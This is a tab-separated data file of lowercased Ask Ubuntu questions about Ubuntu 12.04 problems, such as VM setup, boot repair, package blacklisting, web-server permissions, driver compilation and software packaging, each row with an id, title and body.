195989	setting up a gui-based libvirt vm	i am attempting to create a virtual machine using libvirt that will have a gnome gui and remote accessibility . i have successfully set up the vm to run , but i am unable to access it remotely . the command issued to build the vm : sudo vmbuilder kvm ubuntu -- suite=precise -- flavour=generic -- arch=amd64 -- mirror=http : //de.archive.ubuntu.com/ubuntu -o -- libvirt=qemu : ///system -- part=/usr/xxxx/vmbuilder.partition -- templates=/usr/xxxx/mytemplates -- addpkg=nano -- addpkg=unattended-upgrades -- addpkg=acpid -- firstboot=/usr/xxxx/boot.sh -- cpus=2 -- mem=4096 -- user=xxxx -- name=xxxx -- pass=xxxx -- hostname=xxxx -- bridge=br0 my intent is to have a virtual machine that my client can remotely access with a gui .
195991	is there a way to sync my laptop 's ubuntu install with a jumpdrive ubuntu install ?	so i 'm doing a fresh install of ubuntu on my laptop right now . i also have a jumpdrive with ubuntu installed on it with a persistent setup . what i would like is to be able to plug the jumpdrive into my laptop and have the installs sync certain data . i do n't want docs and such to sync of course , but i would like some software to sync with installs and updates , mostly security and recovery stuff . here 's an example of what i would like to happen : i already have testdisk installed on my jumpdrive but i have n't booted the drive in a while . i plug it in to my laptop where testdisk has been updated and wireshark has been installed . i would like the jumpdrive to check to see what has changed on the laptop install ( in this case testdisk has updated and wireshark has been installed ) and make those changes to the jumpdrive . is there any kind of software to do that ?
195992	how to fix `` operating system not found '' after spilling water over the computer and using boot-repair ?	i have a sony vaio that originally had windows 7 installed on it but i decided to format and install 12.04 . after spilling water on it , i did n't turn it off right away and a minute later the screen went black so i turned off and on again and it said operating system not found i left it overnight disassembled to dry . i turn it on today and it works . about 2 minutes after boot , screen stops responding and i have to manually turn it off , gives me the same os not found error . so i booted the livecd i had for ubuntu and connected to the internet and installed then tried using the boot-repair application to fix it . gave me the message no operating system found too . how to access my data and os ?
195995	i want to install xen to run ubuntu 12.04 and windows 7 at the same time but i ca n't find any good tutorials	i 'm wanting to use xen hypervisor to be able to run both ubuntu 12.04 and windows 7 at the same time using virtualization . i can find plenty of xcp tutorials but i 'm not looking to install the cloud stack , i just want the server confined to my machine . all i need is a link to a decent tutorial for this purpose . i 've read a ton of articles that lead me to believe i 'm on the right track , but not enough to feel comfortable getting it right if i just dive in . i 'm getting caught up on whether i need to install ubuntu and then install xen into it , or do i need to install xen on a small partition and then leave the rest of the hard drive open for the virtualization ... i dunno . basically , i need the virtualization of windows 7 for adobe premiere and after effects ( until lightworks for linux comes out and i can afford nukex ) . if i did n't need those , i 'd be rocking out a straight up ubuntu machine or just using virtualbox for my virtualization . however , i need windows to run as an hvm so it runs like i would expect rather than having the issues i may run into with virtualbox ( video drivers , etc ) . so , any suggestions ?
195996	ubuntu hangs at plymouth screen during shutdown	sometimes ( rather many times ) , when i shutdown using the menu option > > shutdown , the system hangs at a purple screen with dots . i have waited for 10 mins , but then it becomes clear that i need to do a hard shutdown using power button . i am using ubuntu 64 bit amd edition ( 12.04.1 lts ) on hp proliant microserver ( n40l ) with oem hardware .
196002	how do i uninstall a unity web app ?	i accidentally installed the youtube unity web app , and now a `` youtube '' icon appears in my dash . when i click on the icon , a firefox window opens to `` http : //www.http.com//www.youtube.com '' , which appears to be a generic domain squatter landing site . i 've uninstalled the `` unity-webapps-youtube '' package , but the icon is still there .
196005	how usb drives goes after system hard drives	i am using 12.04 . my hard drives usually comes as : sda , with sudo blkid and if i plug-in any usb drive , they comes as : sdb , sdc etc ; after sda . that 's fine . but problem arises after i restart my laptop with connecting those usb drives . they alter and comes first and hard drive goes to the end , like : sudo blkid shows , sda , sdb for usb drives and sdc for hard drives . it 's making problem to mount with /etc/fstab . i could n't find any solutions for this . i would like to have any usb drives after my system hard drives , as in windows . please , help me at this point .
196009	icons in dash show up in weird colors . opengl issue ?	i have a somewhat weird issue with my precise setup ( 32bit ) . since last friday some colors are very different from the original ones . but only in the dash ( not in nautilus or the panel ) . moreover , the gameboy-advance emulator vba-m also got blue , when opengl-rendering is chosen instead of cairo . my graphics chipset is an intel hd 3000 . i tried to erase all unity-related config data and using the original icons , but they are also colored . when using a guest-account , those icons appear orange ( i once changed the color-scheme to blue ) . in fact , it looks a bit inverted but i 'm not sure . i also reinstalled the graphics driver , nothing changed .
196010	error after installing ubuntu	so , i installed ubuntu no problem at all thru the installation . the last step when it said `` please reboot your system so it can take all the changes '' or something like that , i clicked on reboot , then the cd gets rejected , i took the cd , and continues with the rebooting . when the systems started all over again , this little square going thru the whole screen appears and it reads this `` not optimum mode , recomended mode 1280 x 1024 60hz '' and it just keep on going until i pressed enter . then the screen goes black and this is the following message : 11.215614 ] piix4_smbus 0000:00 : of.0 : host smbus controller not enabled ! 11.652783 ] sub2_flash ; flash probe failed ! i downloaded ubuntu 12.04 with a flavour of 32 bit . my server is a dell 1750 , bios a09 and 32 bits any help , please . thank you ! ! ! !
196017	adobe flash player is not working in 12.04	i am facing problems when opening some videos and contents from some web sites . i figured out that adobe flash player is not working properly in my system . i have installed a fresh copy of 12.04 on 64bit machine . i have executed these commands : sudo apt-get update sudo apt-get install flashplugin-installer sudo apt-get install ubuntu-restricted-extras but still , the problem persisted . i will be very thankful for any help .
196020	ubuntu one music store 20gb promotion	just wondering about the ubuntu one promotion where you get 20gb and 6 months streaming for buying a song . does that 20gb apply to anything or just music , and does it last forever or just for 6 months ?
196022	why nslookup result always comes from server 127.0.0.1	i find quite confused that nslookup always get result from server 127.0.0.1 does it because ubuntu uses a local dns cache by dnsmasq ? but i have closed it and flushed my dns cache , then nslookup a host that i have never visited , then the output is still 127.0.0.1 . that makes me quite confused . can anyone explain this for me ? by the way , my dns server is set to 8.8.8.8 .
196024	how to install-and boot-ubuntu on my macpro tower ?	i 'm running mac osx 10.6.8 , have no intention of moving to 10.7 or 10.8 , since apple is turning the platform into a `` toy '' system with too many restrictions . so , for the past 8 months or so , i 've been doing some exploratory `` tunneling '' to try to escape this -- -ubuntu looks pretty good , ( running the web-based demo ... ) and i 've even gotten it to install and run in a `` virtual machine '' [ oracle-virtualbox ] . it can not `` touch '' the mac hardware . so , i have no access to the nvidia card i 've put into my macpro , in the hope of accessing it , and it 's `` cuda '' gpu-parallel processing , to do rendering in blender ... apple `` of course '' has disavowed nvidia , and there are no osx drivers for nvidia cards ... hence my need to `` natively '' boot linux ( ubuntu , or any other `` distro '' that will boot my hardware ) ... does anybody have a working `` recipe '' on how to get refit to work properly ? ( i 'm a total idiot/newbie with command-line `` stuff '' ) or , is there a gui-based `` patch '' that exists , that i can apply to fix this boot-loader related problem ?
196027	how to rsync a chroot without breaking symlinks ?	i 'd like to rsync ( backup ) a chroot environment from outside the chroot . for that i first make a lvm snapshot of the chroot volume and then run rsync on that . the only problem with this approach : symlinks that inside the chroot are absolute are now pointing to the outer-chroot-system and are of course not matching . since i would like to use copy-unsafe-links , this leads to a false link resolution . is there a way to make rsync resolve symlinks from another directory than the main root or is there another way to solve this ?
196031	how to download once and update all computers ?	maybe this will be a duplicate post , but i 've found nothing . i work at a school , in the computer lab we have 8 computers and i installed ubuntu on them . we have classes each wednesday , so the problem that we have is that each week all the computers have updates to install . if i update all the computers , the internet goes terribly slow , because the use of bandwidth ( we have a 5mb connection only ) . is there a way to download the pakages once in a computer and the rest of the computers grab the files from it ? also , if a file is not in the principal computer , it can be downloaded from the internet . i 've seen that is possible to use aptproxy , but the idea is not to have all the repositories in the computer , only the ones we use ( when we run updates or install programs ) thank you
196037	blacklisting grub packages from installing	i am trying to block grub packages from being installed ( after having purged them ) . the problem is virtually identical to blacklisting packages from installing and even involves grub which is exactly what the selected answer illustrated doing . however , it does not work in 12.04 lts using the cloud-image edition . in my scripts to do all this , i first delete the packages involved . it has an annoying uninstall prompt , but i finally figured out how to feed it answers ( see when uninstalling all grub packages for ec2 ami build script , how do i bypass prompting ? for my older question ) to make it move along . after that uninstall is done , i run commands to edit the /etc/apt/apt.conf.d/01autoremove file to add the grub blacklist line as shown in the answer for the question above . executing : diff -u999999 /root/etc_apt_apt.conf.d_01autoremove /etc/apt/apt.conf.d/01autoremove -- - /root/etc_apt_apt.conf.d_01autoremove 2012-04-20 10:21:55.000000000 +0000 +++ /etc/apt/apt.conf.d/01autoremove 2012-10-03 16:28:17.000000000 +0000 @ @ -1,26 +1,27 @ @ apt { neverautoremove { `` ^firmware-linux . * '' ; `` ^linux-firmware $ '' ; `` ^linux-image . * '' ; `` ^kfreebsd-image . * '' ; `` ^linux-restricted-modules . * '' ; `` ^linux-ubuntu-modules- . * '' ; `` ^gnumach $ '' ; `` ^gnumach-image . * '' ; } ; never-markauto-sections { `` metapackages '' ; `` restricted/metapackages '' ; `` universe/metapackages '' ; `` multiverse/metapackages '' ; `` oldlibs '' ; `` restricted/oldlibs '' ; `` universe/oldlibs '' ; `` multiverse/oldlibs '' ; + `` grub* '' ; } ; } ; fyi , the commands are prefixed with `` executing '' and shown that way as part of the mechanism of my script to show what it is doing . the file /root/etc_apt_apt.conf.d_01autoremove in this case is a backup of the original , being compared with the changed file already in its place . it looks right to me . then i do the command with the same package names being negated with the `` - '' suffix . and yet it still installs them as new packages : executing : apt-get -- yes dist-upgrade grub-common- grub-gfxpayload-lists- grub-legacy-ec2- grub-pc- grub-pc-bin- grub2-common- reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following new packages will be installed : grub-common grub-gfxpayload-lists grub-pc grub-pc-bin grub2-common linux-image-3.2.0-31-virtual the following packages will be upgraded : apport apt apt-transport-https apt-utils dbus gnupg gpgv isc-dhcp-client isc-dhcp-common libapt-inst1.4 libapt-pkg4.12 libdbus-1-3 libgc1c2 libxml2 linux-firmware linux-image-virtual linux-virtual multiarch-support ntfs-3g openssl python-apport python-problem-report resolvconf tzdata ubuntu-keyring 25 upgraded , 6 newly installed , 0 to remove and 0 not upgraded . need to get 45.4 mb of archives . after this operation , 35.1 mb of additional disk space will be used . one reason i do not want to have them installed here is the unpredictability of prompts that my script has to feed input answers to . and this just makes no sense for them to be installed when they have been blacklisted , and not really needed . fyi , for reference on why grub is not needed , i am using the recommended option 2 in aws ec2 pv-grub kernel images ( akis ) as described in this document at aws : http : //docs.amazonwebservices.com/awsec2/latest/userguide/userprovidedkernels.html so the big question : how to prevent these packages from being installed whatsoever ?
196038	why gimp 2.8 slow on ubuntu 12.04 ?	i am running ubuntu 12.04 64 bit on 4-core cpu and what i am facing is that when i open a .psd file or a heavy .xcf/.psd file my gimp sends me a `` force quit '' message . i am using gimp for professional image editing so please tell me what i should do . thanks screenshot1-usage 2.2gb of memory by gimp screenshot2-the time i closed gimp-4th core 90 % and drops to 15 %
196043	can i install the amazon lens in 12.04 ?	i want to stay with the lts release cycle but i would like to support ubuntu with my amazon purchases . is there a way i can install the amazon lens in 12.04 ?
196048	restore default power settings on ubuntu 12.04	i 've noticed that ubuntu 12.04 restarts instead of hibernating or when the battery power is below the critical level , and then continues restarting until the battery runs out , and power is lost . is this the normal default setting , or is this atypical ? i ca n't see why it would have been designed this way intentionally - it seems counter-intuitive ( aside from the obvious risk of data loss ) . when i first installed ubuntu 12.04 , it would suspend when the power was critically low , but this is no longer the case - why did this happen ?
196049	editing videos avoiding change in format and resolution	i am recording screencasts with ffmpeg ( * ) , and editing them with kdenlive ( ** ) i have a problem : my videos often look much less sharp after rendering by kdenlive . i have to choose both a video profile and a rendering profile , and i am not sure i found the adequate ones . first : do i really have to choose profiles and such ? is there a way to produce the cuts just keeping the resolution of the original ( maybe with another software ? ) ? i work with videos with the same resolution and sound , all the time if not : what are the best profiles for me , considering quality ? ( * ) ffmpeg -f x11grab -r 25 -s 800x450 -i :0.0+26,65 -f alsa -i plughw:1,0 -vcodec libx264 -crf 0 -preset ultrafast -acodec pcm_s16le video.mkv ( ** ) video profile 1024:576 pal , rendering profile 1280:720 youtube , dowloaded from kdenlive itself
196050	how do i change gtk theme of my app in run time ?	i recently noticed that monodevelop , can change gtk theme in runtime . how do i add it in my quickly app ?
196051	how can i wake my laptop from suspend only on power button ?	my lenovo g560 wakes up from suspend in my backpack sometimes and i hate it . i would power off the whole system , but gnome shell ( which i like ) starts very slowly . is there a way to make the system resume from suspend only by pressing the power button ? i use ubuntu 12.04 with gnome 3.4.2
196054	how can i replace my distro without affecting my windows-partition ?	i 'm new to linux . i recently installed elementary os on my machine , next to windows 7 , so i have a dual boot . now , i 'm not sure elementary os is the right distro for me so i would like to replace elementary os with xubuntu , but i want to keep windows 7 . i did not create a single file in elementary os , so i do n't need to keep a thing of that . how can i achieve that ? i found this topic : how can i remove ubuntu from my dual-boot and replace it with another distribution ? this does not answer my question . during installation , i have get the question this computer currently has multiple operating systems on it . what would you like to do ? install xubuntu alongside them ( documents , music and other personal files will be kept . you can choose which operating system you want each time the computer starts up ) erase disk and install xubuntu ( warning : this will delete all your programs , documents , photos , music , and any other files in all operating systems . ) something else ( you can create or resize partitions yourself , or choose multiple partitions for xubuntu ) i do n't have a clue on what to choose , so elementary is gone , xubuntu gets installed and windows 7 is kept untouched .
196056	how do i completely remove ubuntu from my computer ?	i completely removed windows 7 from my computer and installed a full version of ubuntu on i.e no partition . i just got my windows recovery disk and driver disk in the mail and i would like to remove linux completely and re-install windows . problem is the recovery disk will not boot automatically upon starting up . any suggestions ?
196059	how to modify settings in 'apt.conf ' file that no longer exists in 12.04 ?	i would like to add settings to the file apt.conf , but i realized that it was replaced by a folder called etc/apt/apt.conf.d/ . how can i configure with this new model ?
196062	sftp permission denied on files owned by www-data	i have a pretty standard server set up running apache and php . an app i am running creates files and these are owned by the apache user www-data . files that i upload via sftp are owned by my own user charlesr . all files are part of the www-data group . my problem is that i can not modify or overwrite any of the files via sftp which are owned by www-data , even though charlesr is part of the www-data group . i can modify the files no problem via a ssh session . so i 'm not sure what to do . how do i give my sftp session permissions to modify www-data owned files ? for a bit of background , these are the notes i wrote for myself when setting-up the server : now set up permissions on `/var/www` where your files are served from by default : $ sudo adduser $ user www-data $ sudo chgrp -r www-data /var/www $ sudo chmod -r g+rw /var/www $ sudo chmod -r g+s /var/www now log out and log in again to make the changes take hold . the previous set of commands does the following : 1. adds the current user ( $ user ) to the `www-data` group ; 2. changes `/var/www` to belong to the `www-data` group ; 3. adds read/write permissions to the group that `/var/www` belongs to ; 4. sets the sgid bit on `/var/www` ; this final point bears some explaining . and then i go on to explain to myself what setting the sgid bit means ( i.e . all files created in /var/www become part of the www-data group automatically ) . update it seems that the problem was caused by the app itself or , more specifically , the application framework ( kohana ) setting certain files it writes to 0644 ( rw-r -- r -- ) ; i.e . not group writable . this , coupled with the fact that the files are also owned by www-data meant that i could not edit the files via sftp when logged-in as charlesr . i 'm not sure why i could edit the files via ssh . my guess is that i must have used sudo . here is the permissions strategy i now use thanks to the tireless help of marty fried , who pointed out the flaws in my previous strategy and also helped me marinade in the world of linux permissions until i finally grokked it . thanks marty ! overview files and directories in /var/www should be owned by root : webmasters all devs should be members of the webmasters group all directories in /var/www should be set to : 2775 or u=rwx , g=rwxs , o=rx ( rwxrwx-r-x ) all files in /var/www should be set to : 0664 or ug=rw , o=r ( rw-rw-r -- ) the following should be owned by www-data : webmasters ( i.e . these are the directories that apache needs to be able to write to ) : application/cache application/logs upload client_helpers/upload howto to set up permissions on /var/www where your files are served from by default : sudo addgroup webmasters sudo adduser $ user webmasters sudo chown -r root : webmasters /var/www sudo find /var/www -type f -exec chmod 664 { } \ ; sudo find /var/www -type d -exec chmod 775 { } \ ; sudo find /var/www -type d -exec chmod g+s { } \ ; sudo chown -r www-data : webmasters application/cache/ [ etc ... ] now log out and log in again to make the changes take hold . the previous set of commands does the following : create a new group called webmasters ; all users who need write access to the app files will be added to this group . adds the current user ( $ user ) to the webmasters group . changes the owner of /var/www to root and the group to webmasters group . adds 644 permissions ( -rw-rw-r -- ) to all files in /var/www . adds 775 permissions ( drwxrwxr-x ) to all directories in /var/www . sets the sgid bit on /var/www and all directories therein ; this final point bears some explaining . note also that you can also put a 2 at the front of your chmod octal ( e.g . 2644 ) to do the same thing . sets the owner to www-data ( apache 's user ) and group of the supplied directory to webmaster . this ensures the directory is writable by apache and anyone in the webmasters group . do the same for all other directories that need to be writable .
196069	ubuntu 12.04 patched b43 driver compilation error	i tried this how do i install this patched b43 driver ? guide to install patched b43 driver on ubuntu 12.04 with 3.2.0-31-generic kernel but i ca n't pass compilation phase.here is what i did : wget http : //www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.1/compat-wireless-3.1.1-1.tar.bz2 cd compat-wireless-3.1.1-1/ scripts/driver-select b43 make make -c /lib/modules/3.2.0-31-generic/build m=/home/marco/compat-wireless-3.1.1-1 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-31-generic' cc [ m ] /home/marco/compat-wireless-3.1.1-1/compat/main.o in file included from /home/marco/compat-wireless-3.1.1-1/include/linux/compat-2.6.29.h:5:0 , from /home/marco/compat-wireless-3.1.1-1/include/linux/compat-2.6.h:24 , from < command-line > :0 : include/linux/netdevice.h:1153:5 : warning : `` is_enabled '' is not defined [ -wundef ] include/linux/netdevice.h:1153:15 : error : missing binary operator before token `` ( `` include/linux/netdevice.h : in function ‘netdev_uses_dsa_tags’ : include/linux/netdevice.h:1421:9 : error : ‘struct net_device’ has no member named ‘dsa_ptr’ include/linux/netdevice.h:1422:31 : error : ‘struct net_device’ has no member named ‘dsa_ptr’ include/linux/netdevice.h : in function ‘netdev_uses_trailer_tags’ : include/linux/netdevice.h:1431:9 : error : ‘struct net_device’ has no member named ‘dsa_ptr’ include/linux/netdevice.h:1432:35 : error : ‘struct net_device’ has no member named ‘dsa_ptr’ make [ 3 ] : *** [ /home/marco/compat-wireless-3.1.1-1/compat/main.o ] error 1 make [ 2 ] : *** [ /home/marco/compat-wireless-3.1.1-1/compat ] error 2 make [ 1 ] : *** [ _module_/home/marco/compat-wireless-3.1.1-1 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-31-generic' make : *** [ modules ] error 2 to fix that error i added # include < linux/kconfig.h > to /usr/src/linux-headers-3.2.0-31-generic/include/linux/netdevice.h but now i 'm getting something else make make -c /lib/modules/3.2.0-31-generic/build m=/home/marco/compat-wireless-3.1.1-1 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-31-generic' cc [ m ] /home/marco/compat-wireless-3.1.1-1/compat/main.o ld [ m ] /home/marco/compat-wireless-3.1.1-1/compat/compat.o cc [ m ] /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.o in file included from /home/marco/compat-wireless-3.1.1-1/include/linux/bcma/bcma.h:9:0 , from /home/marco/compat-wireless-3.1.1-1/drivers/bcma/bcma_private.h:8 , from /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:8 : /home/marco/compat-wireless-3.1.1-1/include/linux/ssb/ssb.h : in function ‘ssb_driver_register’ : /home/marco/compat-wireless-3.1.1-1/include/linux/ssb/ssb.h:236:36 : error : ‘this_module’ undeclared ( first use in this function ) /home/marco/compat-wireless-3.1.1-1/include/linux/ssb/ssb.h:236:36 : note : each undeclared identifier is reported only once for each function it appears in in file included from /home/marco/compat-wireless-3.1.1-1/drivers/bcma/bcma_private.h:8:0 , from /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:8 : /home/marco/compat-wireless-3.1.1-1/include/linux/bcma/bcma.h : in function ‘bcma_driver_register’ : /home/marco/compat-wireless-3.1.1-1/include/linux/bcma/bcma.h:170:37 : error : ‘this_module’ undeclared ( first use in this function ) /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c : at top level : /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:12:20 : error : expected declaration specifiers or ‘ ... ’ before string constant /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:13:16 : error : expected declaration specifiers or ‘ ... ’ before string constant /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:182:1 : warning : data definition has no type or storage class [ enabled by default ] /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:182:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol_gpl’ [ -wimplicit-int ] /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:182:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:188:1 : warning : data definition has no type or storage class [ enabled by default ] /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:188:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol_gpl’ [ -wimplicit-int ] /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.c:188:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] make [ 3 ] : *** [ /home/marco/compat-wireless-3.1.1-1/drivers/bcma/main.o ] error 1 make [ 2 ] : *** [ /home/marco/compat-wireless-3.1.1-1/drivers/bcma ] error 2 make [ 1 ] : *** [ _module_/home/marco/compat-wireless-3.1.1-1 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-31-generic' make : *** [ modules ] error 2 any suggestion what to try next ?
196071	need to have 2 versions of python ?	well , as i say , i need to have 2 versions of python installed on my pc . the first must be the latest one in order to use youtube-dl , and the second must be the 2.7 version to use it for a course ( witch says we must not upgrad to get the same results ) . i 'm on ubuntu 12.04 . can anyone propose me something ? ( no virtual machines please ) thanks !
196072	how to work with and manage many open pdfs in ubuntu	it is no secret that working with many open pdfs in ubuntu using the evince viewer is a huge mess and needs some serious overhaul ( or maybe not ? ) . despite the discussion if evince should support tabbing to solve the problem , i am curious what people have come up with in the meantime to work around this problem and make ubuntu more productive . one solution i found is to run evince in chrome or firefox that support tabbing : how can i open pdfs in firefox using evince ( not acrobat ) ? what other tricks you got ?
196075	lexicon alpha not detected by ubuntu	i just got a lexicon alpha usb audio interface , but it 's not showing up as a usb device or as a sound card .
196076	will ubuntu work with my laptop ?	i have a lenovo ideapad z570 . its specs are : intel core i5-2410m processor with intel turbo boost technology* 2.0 ( 2.30ghz , 3mb cache ) ram 4gb hard disk 750gb video graphics nvidia geforce gt 520 m dedicated gpu 1gb display 15.6’’ backlit led hd ( 1366x768 ) , 16:9 widescreen multimedia drive integrated dvd reader/writer or blu-ray disc™1 drive wireless yes bluetooth yes webcam yes ports 4 x usb2.0 ports ( 1 combo with esata ) , 5-in-1 card reader ( sd/sd pro/mmc/ms pro/xd ) , rj-45 , vga , internal analog microphone , 1/8” stereo headphone output & microphone input combo jack , hdmi so my question to you is , will i be able to successfully install ubuntu with all of my drivers working or will i have problems ? also which version of ubuntu should i install ? thank you .
196078	how more than one engineers can code on a single machine	we have ubuntu 12.4 ( desktop version ) running on our server and four engineers ( 2 using windows and 2 using ubuntu ) . is it possible for all of them to code on the same package on the server directly from their machine ( remotely ) ... is there a tool to create a remote working terminal for each of them or maybe using file sharing etc ?
196082	how can i get in contact with an ubuntu developer who can give me advise for my software project ?	i 'm working on an open source space shooter called orxonox . ( www.orxonox.net ) since the ubuntu 12.04 release we faced a problem that we could n't fix which is related to the upstream library tinyxml or cegui ( http : //forum.orxonox.net/viewtopic.php ? f=6 & t=660 ) . that bug is blocking our upcoming release . i 'd be grateful if i can find someone who could be a mentor for both targeting the bug and the release process .
196084	how to install and use flwm ?	i have used lubuntu before , and like the low resource use and high speed of flwm . however , when i install the flwm package using apt-get and log out , i do not get an option to use it . am i missing something , or is this a bug ?
196092	bluetooth between mac osx and ubuntu	i want to share files via bluetooth between a mac osx mountain lion and ubuntu 12.04 but neither of the two can see/recognize each other . why did this happen ? is there a way to solve it ?
196096	detect processor during preseed post-install script	is it possible to detect the processor , such as by uname -p , from within a preseed post-install script ? uname -p returns unknown , and in-target uname -p returns nothing . i ask because i need to fetch and install an architecture-specific .deb file from within the script .
196098	how do i synchronize files or directories on an android device with ubuntu one ?	i 'm missing some very basic ubuntu one usage information , like how to synchronize the files between ubuntu one , my android phone , and my ubuntu 12.04 pc . is there a users guide or reference manual someplace ?
196104	wireless not functional	i am a complete newcomer to ubuntu . today i installed ubuntu 12.04 onto an 3 or 4 year old laptop - an hp dv2221 . install went fine , except that i ca n't get the wireless card to operate . i see that there are drivers installed ( broadcom sta wireless ) and it says they are activated , but the wireless light on the body of the computer is lit as orange , when it should be blue , and if i disconnect the ethernet wire , there is no ability to get onto firefox . i 've looked at some of the similar questions on this site , as well as googling the issue - mostly , i guess i do n't understand how to navigate or do some of the fixes recommended - i 'm fairly adept technologically around windows , but know zilch about linux and how to perform some of the fixes - so , if possible , please tell me how i get to the menus needed to rectify the situation .
196105	dual monitor lock screen problem	ubuntu 12.04 nvidia gtx 550-ti x-swat nvidia driver problem : using 2 monitors . when screen locks there is a blue box on top of the wallpaper and password dialog box that hides the field for entering your password or switching users . problem is on 2 systems with similar hardware ( nvidia card , x-swat driver , dual monitors ) you can still type your password in blindly and hit enter to login but it 's irritating to not be able to see the dialog box .
196107	unable to connect to xmpp account with thunderbird	i am trying to connect to a im account ( webex connect - protocol : jabber/xmpp ) with thunderbird 15 but it fails to connect . it does n't throw any error just says `` not connected '' . pidgin works perfectly with the same setting what i provided in thunderbird 15 . so the question is will thunderbird chat account ( xmpp ) support libnss3 do i debug and collect info , when thunderbird tries to connect to a chat account ? i 'm on ubuntu 12.04
196115	what tools exist to report bugs	as of today i only knew about ubuntu-bug which i could use to report bugs about a specific program . but now i learned about apport-collect and apport-bug which basically are : apport-bug - reports problems to launchpad using apport to collect a lot of information about your system to help the developers fix the problem and avoid unnecessary questions and answers . apport-collect - works as apport-bug but it send the information to an already existing bug report . in my case it was apport-collect 1060268 thanks to brad figg in launchpad . are there any other tools to report bugs ?
196116	ubuntu launch option on startup remains	i used windows installer to install ubuntu and it was getting errors on bootup . well that did n't work , i guess i 'll try and boot from a usb to install it . however , after messing around with uninstalling ( aka deleting ubuntu folder after booting into win7 ) i can not get rid of the launch option . there is nothing in computer management because i never actually booted into ubuntu to create space on my hdd for the os . i ca n't just uninstall using program and features in control panel ( because i already deleted the folder ) now everytime i boot up it gives me the options of booting into windows 7 or ubuntu , how do i disable this page/get rid of the ubuntu launch option ?
196118	how to access localhost on virtualbox host machine	i created a virtual machine on virtualbox with ubuntu 12.04 only to install a lamp solution and use it with my host machine , but i ca n't access the localhost using the ip ( 10.0.2.15 ) in the browser . is there any way to solve this problem ?
196120	error message in avast !	i downloaded avast using terminal command wget http : //files.avast.com/files/linux/avast4workstation_1.3.0-2_i386.deb and the download and installation was successful . then i chose check updates ( database ) from the interface . as soon as the updates were downloaded the following problem started . an error occurred in avast ! engine : invalid argument what should i do to correct the problem ?
196123	packaging matlab ( or , more generally , a large binary , proprietary piece of software )	i 'm trying to package matlab for internal distribution , but this could apply to any piece of software with the same architecture . in fact , i 'm packaging multiple releases of matlab to be installed concurrently . key things very large installation size ( ~4 gb ) composed of a core , and several plugins ( toolboxes ) initially , i created a single `` source '' package ( matlab2011b ) that builds several .debs ( mainly matlab2011b-core and matlab2011b-toolbox-* for each toolbox ) . the debian/rules file is just the standard all : dh $ @ there is no makefile ; only copying files . i use a number of debian/*.install files to specify files to copy from a copy of an installation to /usr/lib/ . the problem is , every time i build the thing ( say , to make a correction to the core package ) , it recopies every file listed in the *.install file to e.g debian/ $ packagename/usr/ ( the build phase ) , and then has to bundle that into a .deb file . it takes a long time , on the order of hours , and is doing a lot of extra work . so my questions are : can you make dh_install do a hardlink copy ( like cp -l ) to save time ? ( afaict from the man page , no . ) maybe i should just get it to do this in the makefile ? ( that 's gon na be a big makefile . ) can you make debuild only rebuild .debs that need rebuilding ? or specify which .debs to rebuild ? is my approach completely stupid ? should i break each of the toolboxes into its own source package too ? ( i 'll have to do some silly templating or something , because there 's hundreds of them . : / )
196125	how can i resize an lvm partition ? ( i.e : physical volume )	i want to shrink my second ( lvm ) partition , in order to create a new partition in the newly freed space . i am using the live cd to do so , because i know i ca n't resize/move this partition while it is in use . when i opened gparted in the live cd , i realized that i could not resize the partition , because when i right-click it , the option `` resize/move '' is disabled . i tried to unmount it , to `` lazy '' unmount it ( umount -l /dev/sda2 ) but it did n't work . a screenshot from gparted :
196127	if i uninstall ubuntu , will windows boot manager still be there ?	i want to get rid of my ubuntu partition , because i never use it on my laptop , only on my desktop . if i remove ubuntu ( i 'm assuming grub will go with it ) , will windows boot manager still allow me to boot into windows , or will i need to do something else ?
196129	i can not play some wma files	i did a backup of several music files from my older windows xp system . now i can play all the .mp3 files but not all the .wma . there are some kinds of wma files that can be reproduced without problems , may refute this in the picture below . the right file can be played , the left is n't . i have long been looking different sites , q & a from here , installing many packages but not luck . an example is this answer . what can i do ? my system : ubuntu 11.10 32b . player : banshee & vlc
196130	ubuntu 12.04 : no video , image thumbnails after repairing partitions	i recently ran into some problem that required i use boot repair to repair partitions . that worked fine but i can not view any thumbnails anymore , all video and image files just show standard icons . some help would be appreciated as i have n't been having any luck with this problem .
196132	ubuntu not shutting down ( going to black screen ) 12.04	i am currently using a usb persistent install of ubuntu . its a simple 4gb drive with a 2.8gb partition ( casper-rw storage partition ) . i setup an administrator account and set it to login automatically . i also removed ubiquity to simply use this as a go anywhere install . heres my issue : i 'm logged in as my account , and i click the top right gear and select `` shut down '' . text pops up showing its quitting processes.. etc . and then goes to the plymouth animation . but ... the screen goes black , and then it goes to the login screen . now when i 'm at the login screen , i go into terminal ( alt+f2 ) and do n't you know , i 'm logged in as ubuntu . so then i try the following : ubuntu @ ubuntu : ~ $ sudo shutdown now it goes to the plymouth screen again as if its shutting down , and the screen goes black once again but the computer has not turned off , as in the usb is still flashing the light , the fans are still on , the only thing off is the screen . is this a bug ? if not maybe i did something wrong ? perhaps its that i made an account but ... if there is a work around for this please let me know .
